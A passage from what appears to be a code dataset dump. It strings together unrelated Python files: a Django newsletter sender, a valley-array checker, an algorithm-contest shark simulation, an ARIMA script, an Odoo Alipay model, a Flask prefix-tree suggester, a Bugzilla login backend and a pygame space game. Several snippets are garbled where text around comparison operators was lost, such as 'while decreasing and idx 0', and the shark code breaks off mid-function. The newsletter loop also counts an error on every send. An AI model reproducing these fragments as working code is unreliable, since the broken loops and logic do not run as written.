if n:\n komunikat = u\"\"\"Adres \"\"\" + email + u\" został usunięty z naszej listy wysyłkowej.\"\n else:\n komunikat = u\"\"\"Adresu \"\"\" + email + u\" nie było na naszej liście!\"\n\n return render_to_response('subscribed.html', {\"komunikat\":komunikat} )\n\ndef make_html():\n from news.models import Newslet, News\n from django.template import Context\n from django.template.loader import get_template\n from datetime import datetime\n latest_newsletter = Newslet.objects.all().order_by('date').reverse()[0]\n t = get_template('newslet.html')\n news = News.objects.filter(newslet = latest_newsletter) \n html = t.render(Context({\"news\":news, \"date\":datetime.now()}))\n t = get_template('newslet.txt')\n txt = t.render(Context({\"news\":news, \"date\":datetime.now()}))\n return {'txt':txt, 'html':html, 'unsent':latest_newsletter.unsent}\n \n \n\n\ndef sending(request):\n if request.user.is_superuser:\n link = \"http://pjn-kujawskopomorskie.pl/newsletter/unsubscribe/?email=\"\n napis = u\"Otrzymałeś ten biuletyn, ponieważ Twój ares e-mail został podany na stronie www.polska-plus.pl. Jeśli nie chcesz otrzymywac biuletynu, możesz usunąć swój adres, korzystając z następującego linku: \"\n# adresy = Subscriber.objects.all()\n adresy = Probne.objects.all()\n# tresc_txt = Body.objects.all().order_by('sending_date').reverse()[0].text\n# tresc_html = Body.objects.all().order_by('sending_date').reverse()[0].text_html\n tresc = make_html()\n tresc_txt = tresc['txt']\n tresc_html = tresc['html']\n subject = u\"Newsletter portalu pjn-kujawskopomorskie.pl\"\n from_email = \"biuro@walkowiak.bydgoszcz.pl\"\n wszystkie = 0\n bledy = 0\n# return HttpResponse(u\"Newsletter zaczyna się wysyłać, treść poniżej:
    \" + tresc_html)\n for a in adresy:\n cale = napis + '' + link + a.email + ''\n txt = tresc_txt + '\\n' + cale\n htm = tresc_html + '

    ' + cale + '

    '\n htm = '' + htm\n bledy_opis = \"\"\n try:\n msg = EmailMultiAlternatives(subject, txt, from_email, [a.email,])\n msg.attach_alternative(htm, \"text/html\")\n msg.send()\n wszystkie = wszystkie + 1\n except:\n pass\n bledy = bledy+1\n bledy_opis=bledy_opis + a.email + \", \"\n \n return HttpResponse(u\"Newsletter wysłany :) maili: \" + str(wszystkie) + u\", błędów: \" + str(bledy) + u\"
    błędy: \" + bledy_opis )\n else:\n return HttpResponse(u\"Nie jesteś adminem\")\n\n\n","sub_path":"newsletter/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"546996438","text":"# 2. Write a function to check if an integer array is a valid valley array. Given an integer array L, L is a valid valley array if and only if:\n# 1)\tL.length >= 3\n# 2)\tThere exists some i with 0 < i < L.length – 1 such that:\n# a.\tL[0] >= L[1] >= … >= L[i-1] > L[i]\n# b.\tL[i] <= L[i+1] <= … <= L[L.length – 1]\n\ndef validateArray(L):\n #check length\n if len(L) < 3:\n return False\n \n idx = 1\n decreasing = True\n #[6, 2, 1, 3]\n while decreasing and idx 0 :\n decreasing = False\n idx +=1\n\n if decreasing: \n # if it's still decreasing\n #still decrease even at the last integer\n return False\n\n increasing = True\n while increasing and idx 1:\n matrix[row][col][REMAIN] -= 1\n elif not matrix[row][col][SHARK] and matrix[row][col][REMAIN] == 1:\n matrix[row][col][SMELL], matrix[row][col][REMAIN] = 0, 0\n # print_board(matrix)\n\ndef check(matrix):\n cnt = 0\n for row in range(N):\n for col in range(N):\n if matrix[row][col][SHARK]:\n cnt += 1\n return cnt\n\ni, cnt = 0, check(board)\nwhile cnt > 1:\n i += 1\n if i > 1000:\n break\n # print('==========', i, '단계==========')\n move_shark(board)\n cnt = check(board)\nif cnt == 1:\n print(i)\nelse:\n print(-1)","sub_path":"BOJ/19237 어른 상어.py","file_name":"19237 어른 상어.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"505665997","text":"import dataset\nfrom preprocessing import *\nfrom models import *\nfrom evaluation import *\n\ndef main():\n\n data = dataset.UNDevGoalsDataset()\n \n print('Predicting 2007 from 1972:2006')\n \n X_simple,Y_simple = data.preprocess(pp_fn = preprocess_simple)\n status_quo_predictions_simple = data.predictions(model_name=status_quo_model, preprocessed_data=X_simple)\n status_quo_simple_rmse = data.error(error_fn=RMSE, predictions=status_quo_predictions_simple)\n print('Status quo model RMSE with simple preprocessing:', status_quo_simple_rmse)\n \n \n X_improved,Y_improved = data.preprocess(pp_fn = preprocess_avg_NANs)\n status_quo_predictions_improved = data.predictions(model_name=status_quo_model, preprocessed_data=X_improved)\n status_quo_improved_rmse = data.error(error_fn=RMSE, predictions=status_quo_predictions_improved)\n print('Status quo model RMSE with better preprocessing:', status_quo_improved_rmse)\n\n\n arima_predictions_simple = data.predictions(model_name=arima, order=(1,1,1), lookback=5, preprocessed_data=X_simple)\n arima_rmse_simple = data.error(error_fn=RMSE, predictions=arima_predictions_simple)\n print('ARIMA model RMSE with simple preprocessing:', arima_rmse_simple)\n \n arima_predictions_improved = data.predictions(model_name=arima, order=(1,1,1), lookback=5, preprocessed_data=X_improved)\n arima_rmse_improved = data.error(error_fn=RMSE, predictions=arima_predictions_improved)\n print('ARIMA model RMSE with better preprocessing:', arima_rmse_improved)\n \n\nif __name__ == '__main__':\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"643402074","text":"# -*- coding: utf-8 -*-\nfrom openerp import api, fields, models\nfrom odoo.addons.ihyf_payment_gateway.common.backend_common import *\n\n\nclass PaymentAlipay(models.Model):\n _name = 'payment.alipay'\n\n name = fields.Char(\n string='Name',\n required=True\n )\n\n payment_user_account_id = fields.Many2one(\n comodel_name='payment.user.account',\n string='Payment User Account',\n )\n\n seller_id = fields.Char(\n string='Seller ID',\n required=True\n )\n\n app_id = fields.Char(\n string='App ID',\n required=True\n )\n\n private_rsa = fields.Text(\n string='Private RSA'\n )\n\n account_id = fields.Char(\n string='Account ID'\n )\n\n @api.onchange('name')\n def onchange_name(self):\n if self.name:\n if not self.account_id:\n self.account_id = get_md5_string(self.name)\n","sub_path":"payment_gateway/models/payment_alipay.py","file_name":"payment_alipay.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"102827444","text":"from flask import Flask, request, jsonify\n\napp = Flask(__name__)\n\nclass PrefixTree:\n def __init__(self):\n self.root = [{}]\n\n def add(self, string, jsn, rating):\n \n if self.check(string):\n return\n wrk_dict = self.root\n # print(wrk_dict)\n for i in string:\n if i in wrk_dict[0]: \n wrk_dict=wrk_dict[0][i] #опускаемся по строке по словарю\n if len(wrk_dict[2])<10:\n wrk_dict[2][rating] = [string, jsn] #МОЖНОНЕСРАВНИВАТЬ, просто пихаем\n else:#ЕСЛИ НАБРАНО, то на место той минимальной частоты ставим новый \n if rating > wrk_dict[1]:#Если рейтинг б минимального\n wrk_dict[2][wrk_dict[1]] = [string, jsn] \n \n wrk_dict[1]=min(wrk_dict[2].keys()) \n else:#Если его нет в словаре, то по нему пока положим данное в топ\n wrk_dict[0][i] = [{}, rating, {rating: [string, jsn]}]\n wrk_dict = wrk_dict[0][i]\n wrk_dict.append(True)\n #TODO добавить строку\n def check(self, string):\n wrk_dict = self.root\n for i in string:\n if i in wrk_dict[0]:\n wrk_dict = wrk_dict[0][i]\n else:\n return False\n #print(len(wrk_dict))\n #print(wrk_dict)\n if len(wrk_dict) == 4:\n return True\n return False\n #TODO проверить наличие строки\n \n def check_part(self, string):\n wrk_dict = self.root\n for i in string:\n if i in wrk_dict[0]:\n wrk_dict = wrk_dict[0][i]\n else:\n return False\n return True\n\n def top(self, string):\n top=[]\n if not self.check_part(string):\n return []\n wrk_dict=self.root\n #print(\"Передалось\")\n #print(wrk_dict)\n if self.check_part(string):\n for i in string:\n if i in wrk_dict[0]:\n wrk_dict=wrk_dict[0][i]\n #print(wrk_dict)\n index=[]\n list=[]\n for i in wrk_dict[2]:#В него клала топ\n #print(\"***\")\n index.append(int(i))\n list.append(wrk_dict[2][i])\n n=1\n while nindex[j+1]:\n index[j],index[j+1]=index[j+1],index[j]\n list[j],list[j+1]=list[j+1],list[j]\n n+=1\n return list\n \n #TODO реализация класса prefix tree, методы как на лекции + метод дать топ 10 продолжений. Скажем на строку кросс выдаем кроссовки, кроссовочки итп. Как хранить топ? \n #Решать вам. Можно, конечно, обходить все ноды, но это долго. Дешевле чуток проиграть по памяти, зато отдавать быстро (скажем можно взять кучу)\n #В терминальных (конечных) нодах может лежать json с топ актерами.\ndef init_prefix_tree(filename):\n with open(filename, 'r+') as f:\n for x in f:\n #x=f.read().strip()\n s = x.strip().split('/t')\n pr_tree.add(s[0],s[1],s[2])\n f.close()\npr_tree = PrefixTree()\ninit_prefix_tree('1.txt') \n\n@app.route(\"/get_sudgest/\", methods=['GET', 'POST'])\ndef return_sudgest(string):\n #TODO по запросу string вернуть json, c топ-10 саджестами, и значениями из нод\n \n json = jsonify(pr_tree.top(string))\n return json\n@app.route(\"/\")\ndef hello():\n #TODO должна возвращатьс инструкция по работе с сервером\n instr=\"Из файла загружаются данные. По введенному вами префиксу, вернется топ 10 популярных саджестов.\"\n return instr\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"homeworks/05/flask_prefix_tree.py","file_name":"flask_prefix_tree.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"106348457","text":"import mnist_loader as loader\nfrom NN import NN\n\ndef main():\n training_data, validation_data, test_data = loader.load_data_wrapper()\n nn = NN([784,30,10])\n nn.SGD(training_data,30,10,3.0,test_data=test_data)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"NN/mnist/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"485981500","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport xmlrpclib\n\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import PermissionDenied\nfrom django.utils.translation import ugettext as _\nfrom djblets.siteconfig.models import SiteConfiguration\nfrom reviewboard.accounts.backends import AuthBackend\n\nfrom rbbz.forms import BugzillaAuthSettingsForm\nfrom rbbz.models import get_or_create_bugzilla_users\nfrom rbbz.transports import bugzilla_transport\n\n\nclass BugzillaBackend(AuthBackend):\n \"\"\"\n Authenticate a user via Bugzilla XMLRPC.\n \"\"\"\n\n backend_id = _('bugzilla')\n name = _('Bugzilla')\n login_instructions = _('using your Bugzilla credentials.')\n settings_form = BugzillaAuthSettingsForm\n\n def bz_error_response(self, request):\n logout(request)\n return PermissionDenied\n\n def authenticate(self, username, password, cookie=False):\n username = username.strip()\n siteconfig = SiteConfiguration.objects.get_current()\n xmlrpc_url = siteconfig.get('auth_bz_xmlrpc_url')\n\n if not xmlrpc_url:\n return None\n\n transport = bugzilla_transport(xmlrpc_url)\n proxy = xmlrpclib.ServerProxy(xmlrpc_url, transport)\n\n if cookie:\n # Username and password are actually bugzilla cookies.\n transport.set_bugzilla_cookies(username, password)\n user_id = username\n else:\n transport.remove_bugzilla_cookies()\n\n try:\n result = proxy.User.login({'login': username,\n 'password': password})\n except xmlrpclib.Fault:\n return None\n\n user_id = result['id']\n\n try:\n user_data = proxy.User.get({'ids': [user_id]})\n except xmlrpclib.Fault:\n return None\n\n users = get_or_create_bugzilla_users(user_data)\n\n if not users:\n return None\n\n user = users[0]\n\n if not user.is_active:\n return None\n\n if not cookie:\n (user.bzlogin, user.bzcookie) = transport.bugzilla_cookies()\n\n return user\n\n def get_or_create_user(self, username, request):\n \"\"\"Always check Bugzilla for updates.\"\"\"\n username = username.strip()\n siteconfig = SiteConfiguration.objects.get_current()\n xmlrpc_url = siteconfig.get('auth_bz_xmlrpc_url')\n\n if not xmlrpc_url:\n return None\n\n transport = bugzilla_transport(xmlrpc_url)\n\n if not transport.set_bugzilla_cookies_from_request(request):\n raise self.bz_error_response(request)\n\n proxy = xmlrpclib.ServerProxy(xmlrpc_url, transport)\n\n try:\n user_data = proxy.User.get({'names': [username]})\n except xmlrpclib.Fault:\n raise self.bz_error_response(request)\n\n # Just store the results.\n get_or_create_bugzilla_users(user_data)\n\n try:\n return User.objects.get(username=username)\n except User.DoesNotExist:\n return None\n\n def query_users(self, query, request):\n if not query:\n return\n\n siteconfig = SiteConfiguration.objects.get_current()\n xmlrpc_url = siteconfig.get('auth_bz_xmlrpc_url')\n\n if not xmlrpc_url:\n return None\n\n transport = bugzilla_transport(xmlrpc_url)\n\n if not transport.set_bugzilla_cookies_from_request(request):\n raise PermissionDenied\n\n proxy = xmlrpclib.ServerProxy(xmlrpc_url, transport)\n\n try:\n get_or_create_bugzilla_users(proxy.User.get({'match': [query]}))\n except xmlrpclib.Fault:\n raise PermissionDenied\n","sub_path":"rbbz/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"247776835","text":"import pygame as pg\n\nimport sys, os\n\nfrom scene import *\nfrom tools import *\nfrom folders import *\nfrom config import *\nfrom BBDD import BBDD\n\nfrom the_quest.sprites import *\nfrom the_quest.optional_screens import *\n\nclass InitialAnimation(Scene):\n '''\n Class for show initial animation of Title\n '''\n def __init__(self):\n Scene.__init__(self)\n\n self.x_pos_ship = 800 # For the movement of ship\n self.y_pos_ship = 110\n self.x_pos_title = 848 # For the movement of Title\n self.y_pos_title = 75\n\n def update(self, screen, dt):\n screen.fill(BLACK)\n\n load_and_draw_image(screen, SHIP_TITLE, x=self.x_pos_ship, y=self.y_pos_ship)\n create_draw_text(screen, TITLE, 120, 'THE QUEST', WHITE, pos_x=self.x_pos_title, pos_y=self.y_pos_title)\n\n self.x_pos_ship -= 5\n if self.x_pos_title > 68.0:\n self.x_pos_title -= 5\n if self.x_pos_ship <= -60:\n # When title is on position we switch to TitleScene\n self.switchToScene(TitleScene())\n \n pg.display.flip()\n\nclass TitleScene(Scene):\n '''\n Class who draws the TitleScene\n '''\n def __init__(self):\n Scene.__init__(self)\n\n self.option = 0\n\n # Title Music\n self.title_sound = TITLE_BG_SOUND\n self.title_sound.set_volume(DEFAULT_VOL)\n self.title_sound.play()\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_DOWN:\n if self.option < 3:\n self.option += 1\n OPTION_SOUND.play()\n if event.key == pg.K_UP:\n if self.option > 0:\n self.option -= 1\n OPTION_SOUND.play()\n if event.key == pg.K_SPACE:\n SELECTED_SOUND.play()\n self._check_op()\n\n def _check_op(self):\n '''\n Method to know which option was choosed.\n We switch to that Scene\n ''' \n if self.option == 0:\n # Start New Game\n self.title_sound.stop()\n self.switchToScene(Fade(BACKGROUND, Transition(Level1(GameOver()), 3, 0)))\n elif self.option == 1:\n # How To Play Screen\n self.title_sound.stop()\n self.switchToScene(HowToPlay())\n elif self.option == 2:\n self.title_sound.stop()\n self.switchToScene(Records())\n else:\n # Exit Game\n self.terminateScene()\n\n def update(self, screen, dt):\n screen.fill(BLACK)\n create_draw_text(screen, TITLE, 120, 'THE QUEST', WHITE, position='topcenter')\n \n self._draw_options(screen)\n\n pg.display.flip()\n\n def _draw_options(self, screen):\n '''\n Method that shows in red color the actual option selected\n '''\n \n text = ['New Game', 'How To Play', 'Records', 'Exit']\n pos = ['center', 'closecenterbottom', 'closecenterbottom2', 'closecenterbottom3']\n\n for x in range(4):\n if x == self.option:\n create_draw_text(screen, SPACE2, 36, text[x], RED, position=pos[x])\n else:\n create_draw_text(screen, SPACE2, 36, text[x], WHITE, position=pos[x])\n\nclass HowToPlay(Scene):\n '''\n Class To show How To Play page 1\n '''\n def __init__(self):\n Scene.__init__(self)\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE:\n self.switchToScene(TitleScene())\n if event.key == pg.K_RIGHT:\n self.switchToScene(HowToPlay2())\n\n def update(self, screen, dt):\n self.ticks += dt\n screen.fill(BLACK)\n \n self._draw_main_text(screen)\n self._draw_keys(screen)\n self._draw_keys_text(screen)\n\n pg.display.update()\n\n def _draw_main_text(self, screen):\n create_draw_text(screen, SPACE2, 54, 'HOW TO PLAY', WHITE, position='topcenter')\n create_draw_text(screen, SPACE2, 36, 'Keys to use:', WHITE, position='closecenterup')\n self._blink_message(screen, SPACE2, 24, 'Press < SPACE > to go Main Menu', WHITE, position='bottomcenter')\n create_draw_text(screen, SPACE2, 16, 'Press to next page', WHITE, pos_x=460, pos_y=552)\n create_draw_text(screen, SPACE2, 20, '1/3', WHITE, pos_x=720, pos_y=550)\n\n def _draw_keys(self, screen):\n images = {\n 1:{\n 'img':UP_KEY,\n 'x':40,\n 'y':250\n },\n 2:{\n 'img':DOWN_KEY,\n 'x':40,\n 'y':330\n },\n 3:{\n 'img':SPACEBAR_KEY,\n 'x':390,\n 'y':250\n },\n 4:{\n 'img':ESCAPE_KEY,\n 'x':390,\n 'y':330\n },\n 5:{\n 'img':P_KEY,\n 'x':250,\n 'y':405\n }\n }\n for x in range(1,6):\n load_and_draw_image(screen, images[x]['img'], images[x]['x'], images[x]['y'])\n \n def _draw_keys_text(self, screen):\n text = {\n 1:{\n 'text':'Moves ship up',\n 'x':120,\n 'y':270,\n },\n 2:{\n 'text':'Moves ship down',\n 'x':120,\n 'y':350,\n },\n 3:{\n 'text':'Action/Accept Key',\n 'x':520,\n 'y':270,\n },\n 4:{\n 'text':'Quit the game',\n 'x':520,\n 'y':350,\n },\n 5:{\n 'text':'Pause the game',\n 'x':360,\n 'y':425,\n },\n }\n for x in range(1,6):\n create_draw_text(screen, SPACE2, 24, text[x]['text'], WHITE, pos_x=text[x]['x'], pos_y=text[x]['y']) \n\nclass HowToPlay2(Scene):\n '''\n Class To show How To Play page 2\n '''\n def __init__(self):\n Scene.__init__(self)\n self.bg_img = BACKGROUND\n self.ship_img = SHIP\n self.planet = JUPITER\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE:\n self.switchToScene(TitleScene())\n if event.key == pg.K_LEFT:\n self.switchToScene(HowToPlay())\n if event.key == pg.K_RIGHT:\n self.switchToScene(HowToPlay3())\n\n def update(self, screen, dt):\n screen.blit(self.bg_img, (0, 0))\n screen.blit(self.planet, (530, 50))\n screen.blit(self.ship_img, (2, (HEIGHT/2)-24))\n\n self._top_level_menu(screen)\n self._draw_main_text(screen)\n self._landing_lines(screen)\n self._landing_messages(screen)\n\n pg.display.flip()\n\n def _draw_main_text(self, screen):\n create_draw_text(screen, SPACE2, 50, 'POSITIONS TO LAND', WHITE, position='topcenter')\n create_draw_text(screen, SPACE2, 16, 'Press to switch page', WHITE, pos_x=80, pos_y=552)\n create_draw_text(screen, SPACE2, 20, '2/3', WHITE, pos_x=20, pos_y=550)\n\n def _top_level_menu(self, screen):\n top_level_img = TOP_LEVEL\n top_level_img_rect = top_level_img.get_rect()\n\n text_to_draw = [('Lifes - 3', 50), ('Meteors Dodged - 0', 240), ('Score - 0', 580)]\n for element in text_to_draw:\n create_draw_text(screen, SPACE2, 24, element[0], WHITE, pos_x=element[1], pos_y=10)\n \n screen.blit(top_level_img, (0, 0))\n\n def _landing_lines(self, screen):\n\n # Rotating Zone\n pg.draw.line(screen, SILVER, (0, 70), (20, 70))\n pg.draw.line(screen, SILVER, (0, HEIGHT-20), (20, HEIGHT-20))\n\n # Perfect Landing\n pg.draw.line(screen, GREEN, (0, (HEIGHT/2)-40), (20, (HEIGHT/2)-40))\n pg.draw.line(screen, GREEN, (0, (HEIGHT/2)+40), (20, (HEIGHT/2)+40))\n\n # Succesfully Landing\n pg.draw.line(screen, ORANGE, (0, (HEIGHT/2)-80), (20, (HEIGHT/2)-80))\n pg.draw.line(screen, ORANGE, (0, (HEIGHT/2)+80), (20, (HEIGHT/2)+80))\n\n # Not Bad Landing\n pg.draw.line(screen, RED, (0, (HEIGHT/2)-120), (20, (HEIGHT/2)-120))\n pg.draw.line(screen, RED, (0, (HEIGHT/2)+120), (20, (HEIGHT/2)+120))\n\n def _landing_messages(self, screen):\n\n create_draw_text(screen, SPACE2, 16, 'ROTATING ZONE', SILVER, pos_x=25 ,pos_y=63)\n create_draw_text(screen, SPACE2, 16, 'PERFECT LANDING', GREEN, pos_x=25 ,pos_y=(HEIGHT/2)-47)\n create_draw_text(screen, SPACE2, 16, 'SUCCESSFULLY LANDING', ORANGE, pos_x=25 ,pos_y=(HEIGHT/2)-87)\n create_draw_text(screen, SPACE2, 16, 'NOT BAD LANDING', RED, pos_x=25 ,pos_y=(HEIGHT/2)-127)\n\nclass HowToPlay3(Scene):\n '''\n Class To show How To Play page 3\n '''\n def __init__(self):\n Scene.__init__(self)\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE:\n self.switchToScene(TitleScene())\n if event.key == pg.K_LEFT:\n self.switchToScene(HowToPlay2())\n\n def update(self, screen, dt):\n self.ticks += dt\n screen.fill(BLACK)\n\n self._draw_main_text(screen)\n self._draw_landing_text(screen)\n self._draw_lifes_text(screen)\n\n pg.display.flip()\n\n def _draw_main_text(self, screen):\n create_draw_text(screen, SPACE2, 50, 'ADDITIONAL BONUS', WHITE, position='topcenter')\n create_draw_text(screen, SPACE2, 20, '- At the end of each level we can get a bonus based on:', WHITE, pos_x=100, pos_y=150)\n create_draw_text(screen, SPACE2, 16, 'Press to previous page', WHITE, pos_x=80, pos_y=552)\n create_draw_text(screen, SPACE2, 20, '3/3', WHITE, pos_x=20, pos_y=550)\n self._blink_message(screen, SPACE2, 24, 'Press < SPACE > to go Main Menu', WHITE, position='bottomcenter')\n \n def _draw_landing_text(self, screen):\n create_draw_text(screen, SPACE2, 20, '- Landing:', WHITE, pos_x=200, pos_y=200)\n create_draw_text(screen, SPACE2, 20, 'PERFECT = 1000 pts', GREEN, pos_x=330, pos_y=200)\n create_draw_text(screen, SPACE2, 20, 'SUCCESSFULLY = 500 pts', ORANGE, pos_x=330, pos_y=240)\n create_draw_text(screen, SPACE2, 20, 'NOT BAD = 250 pts', RED, pos_x=330, pos_y=280)\n\n def _draw_lifes_text(self, screen):\n create_draw_text(screen, SPACE2, 20, '- Lifes:', WHITE, pos_x=200, pos_y=330)\n create_draw_text(screen, SPACE2, 20, '3 LIFES = 1000 pts', GREEN, pos_x=330, pos_y=330)\n create_draw_text(screen, SPACE2, 20, '2 LIFES = 500 pts', ORANGE, pos_x=330, pos_y=370)\n create_draw_text(screen, SPACE2, 20, '1 LIFE = 250 pts', RED, pos_x=330, pos_y=410)\n\nclass Records(Scene):\n '''\n Class To show Records\n '''\n def __init__(self):\n Scene.__init__(self)\n\n BBDD()._set_records_to_five()\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE:\n self.switchToScene(TitleScene())\n if event.key == pg.K_r:\n BBDD().reset_records()\n\n def update(self, screen, dt):\n self.ticks += dt\n screen.fill(BLACK)\n\n self._draw_static_text(screen)\n self._draw_records(screen)\n self._blink_message(screen, SPACE2, 24, 'Press < SPACE > to go Main Menu', WHITE, position='bottomcenter')\n\n pg.display.flip()\n\n def _draw_static_text(self, screen):\n # Draws static text\n create_draw_text(screen, SPACE2, 20, 'Press R to reset records', WHITE, pos_x=10, pos_y=10)\n create_draw_text(screen, SPACE2, 54, 'RECORDS', WHITE, position='topcenter')\n create_draw_text(screen, SPACE2, 28, 'RANK', WHITE, pos_x=150, pos_y=180)\n create_draw_text(screen, SPACE2, 28, 'SCORE', WHITE, pos_x=340, pos_y=180)\n create_draw_text(screen, SPACE2, 28, 'NAME', WHITE, pos_x=550, pos_y=180)\n\n def _draw_records(self, screen):\n # Records stored in our database\n records = BBDD().get_dict_records(BBDD()._select_records())\n\n # Draws records\n rank_y=230\n for x in range(1,6):\n create_draw_text(screen, SPACE2, 24, records[f'record{x}']['rank'], records[f'record{x}']['color'], pos_x=190, pos_y=rank_y)\n create_draw_text(screen, SPACE2, 24, str(records[f'record{x}']['score']), records[f'record{x}']['color'], pos_x=350, pos_y=rank_y)\n create_draw_text(screen, SPACE2, 24, records[f'record{x}']['name'], records[f'record{x}']['color'], pos_x=560, pos_y=rank_y)\n rank_y += 40\n\nclass Fade(Scene):\n '''\n Class to makes the fade from one scene to another\n next_level_bg = we indicate the background of next level\n to make a soft fade, only if its a fade to a level game, \n else, we indicate as None and we use fade surface\n next_scene = to indicate the next scene after the fade\n effect\n '''\n def __init__(self, next_level_bg, next_scene):\n Scene.__init__(self)\n self.fade = pg.Surface((WIDTH, HEIGHT))\n self.fade.fill(BLACK)\n self.nxt_lvl_bg = next_level_bg\n self.next_scene = next_scene\n\n def update(self, screen, dt):\n \n self._fade_out(screen)\n self._fade_in(screen)\n self.switchToScene(self.next_scene)\n\n def _fade_out(self, screen):\n for alpha in range(0, 255):\n self.fade.set_alpha(alpha) \n screen.blit(self.fade, (0,0))\n pg.display.flip()\n\n def _fade_in(self, screen):\n for alpha in range(255, 0, -1):\n self.fade.set_alpha(alpha)\n if self.nxt_lvl_bg:\n screen.blit(self.nxt_lvl_bg, (0,0))\n else:\n screen.blit(self.fade, (0,0))\n screen.blit(self.fade, (0,0))\n pg.display.flip()\n pg.time.delay(5)\n\nclass Transition(Scene):\n '''\n Class who makes the animation of top level and ship appears\n at same time\n next_level = indicates the next level to start\n lifes = to show in top level the remaining lifes if isn't the\n first level\n score = same as lifes\n '''\n def __init__(self, next_level, lifes, score):\n Scene.__init__(self)\n\n self.ship_img = SHIP\n self.ix_pos = -50\n self.next_level = next_level\n self.lifes = lifes\n self.score = score\n\n def _keydown_events(self, event, screen):\n Scene._keydown_events(self, event, screen)\n if event.key == pg.K_SPACE and self.ix_pos == 0:\n self.switchToScene(self.next_level)\n\n def update(self, screen, dt):\n self.ticks += dt\n\n load_and_draw_image(screen, BACKGROUND)\n load_and_draw_image(screen, TOP_LEVEL, y=self.ix_pos)\n\n create_draw_text(screen, SPACE2, 24, f'Lifes - {self.lifes}', WHITE, pos_x=50, pos_y=self.ix_pos+10)\n create_draw_text(screen, SPACE2, 24, 'Meteors Dodged - 0' , WHITE, pos_x=240, pos_y=self.ix_pos+10)\n create_draw_text(screen, SPACE2, 24, f'Score - {self.score}', WHITE, pos_x=580, pos_y=self.ix_pos+10)\n\n screen.blit(self.ship_img, (self.ix_pos, 276))\n\n if self.ix_pos == 0:\n create_draw_text(screen, SPACE2, 54, 'READY?', WHITE, position='closecenterup')\n self._blink_message(screen, SPACE2, 24, 'Press < SPACE > to start', WHITE, position='center')\n\n if self.ix_pos != 0:\n if self.ticks >= 85:\n self.ix_pos += 1\n self.ticks = 0\n\n pg.display.flip()\n\nclass Level1(LevelScene):\n '''\n Class for first level of game\n go_scene = GameOver scene if ship state is \"DEAD\"\n '''\n def __init__(self, go_scene):\n LevelScene.__init__(self, go_scene)\n self.planet_name = 'JUPITER'\n self.planet = JUPITER\n self.rect_planet = self.planet.get_rect(x=WIDTH, y=50)\n\n def _keydown_events(self, event, screen):\n LevelScene._keydown_events(self, event, screen)\n # Click for finish level\n if self.ship.state == STATES['HIDDEN']:\n # Level Finished\n self.ship._prepare_ship()\n self.bg_sound.stop()\n self.switchToScene(Fade(BACKGROUND, (Transition(Level2(GameOver(),self.score, self.ship.lifes), self.ship.lifes, self.score))))\n\n if event.key == pg.K_p and self.ship.state == STATES['ALIVE']:\n # Pause Menu\n pg.mixer.pause()\n reset, main_menu = self.pause_screen.on_pause(screen)\n if reset:\n pg.mixer.stop()\n self._reset(all_data=True)\n self.switchToScene(Transition(Level1(GameOver()), self.ship.lifes, self.score))\n if main_menu:\n pg.mixer.stop()\n self.switchToScene(TitleScene())\n pg.mixer.unpause()\n \n def _reset(self, all_data=False):\n LevelScene._reset(self)\n self.score = 0\n if all_data:\n self.ship.lifes = LIFES\n\nclass Level2(AdvancedLevelScene):\n '''\n Class for second level of game\n score = for add the last score from last level\n lifes = same as score\n '''\n\n def __init__(self, go_scene, score, lifes):\n AdvancedLevelScene.__init__(self, go_scene, score, lifes)\n self.planet_name = 'MARS'\n self.planet = MARS\n self.rect_planet = self.planet.get_rect(x=WIDTH, y=50)\n self.level = 2\n\n def _keydown_events(self, event, screen):\n '''\n We check if our final score is better than our database\n records scores. If beats anyone of them, we will switch\n to NewRecord scene, else, to NoRecord scene\n '''\n LevelScene._keydown_events(self, event, screen)\n # Click for finish level\n if self.ship.state == STATES['HIDDEN']:\n # Level Finished\n self.ship._prepare_ship()\n self.bg_sound.stop()\n if BBDD().check_new_record(self.score):\n self.switchToScene(Fade(None, NewRecord(self.score))) # <- Scene Next Level/Records\n else:\n self.switchToScene(Fade(None, NoRecord()))\n if event.key == pg.K_p and self.ship.state == STATES['ALIVE']:\n # Pause Menu\n pg.mixer.pause()\n reset, main_menu = self.pause_screen.on_pause(screen)\n if reset:\n pg.mixer.stop()\n self._reset(all_data=True)\n self.switchToScene(Transition(Level2(GameOver(), self.score, self.ship.lifes), self.ship.lifes, self.score))\n if main_menu:\n pg.mixer.stop()\n self.switchToScene(TitleScene())\n pg.mixer.unpause()\n \n def _reset(self, all_data=False):\n AdvancedLevelScene._reset(self)\n if all_data:\n self.ship.lifes = self.remaining_lifes\n\nclass GameOver(Scene):\n '''\n Class who draws GameOver scene\n '''\n\n def __init__(self):\n Scene.__init__(self)\n \n def 